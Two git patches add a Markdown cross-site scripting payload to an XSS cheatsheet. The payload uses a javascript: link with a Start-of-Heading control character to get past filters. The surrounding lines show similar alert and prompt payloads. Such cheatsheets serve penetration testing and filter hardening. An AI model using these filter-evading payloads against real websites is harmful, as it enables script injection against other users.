From 0e8fcc76785ea7cfa70216cfaed7a8f942a4eea4 Mon Sep 17 00:00:00 2001
From: Tarunkant Gupta <tarunkant05@gmail.com>
Date: Mon, 5 Mar 2018 21:45:31 +0530
Subject: [PATCH 1/2] Added one payload in Markdown XSS

Sometimes we can't start directly with javascript keyword then that time we need SOH(Start of Heading) character.
---
 cheatsheets/xss.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md
index 744e9c9..95f2439 100644
--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@@ -118,6 +118,10 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
 [a]: (javascript:prompt(1))
 ```
 
+```md
+[a]:(
javascript:alert(1))
+```
+
 
 **Flash SWF XSS**
 

From d148279deea9d1b728e70c51a61a89ddc3b31ebd Mon Sep 17 00:00:00 2001
From: Tarunkant Gupta <tarunkant05@gmail.com>
Date: Mon, 5 Mar 2018 21:49:02 +0530
Subject: [PATCH 2/2] Added one payload in Markdown XSS

Sometimes we can't start with javascript keyword directly then, we need SOH(Start of Heading) Character.
---
 cheatsheets/xss.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md
index 95f2439..a8f30c4 100644
--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@@ -119,7 +119,7 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
 ```
 
 ```md
-[a]:(
javascript:alert(1))
+[a]:(
javascript:alert(1))           //Add SOH Character
 ```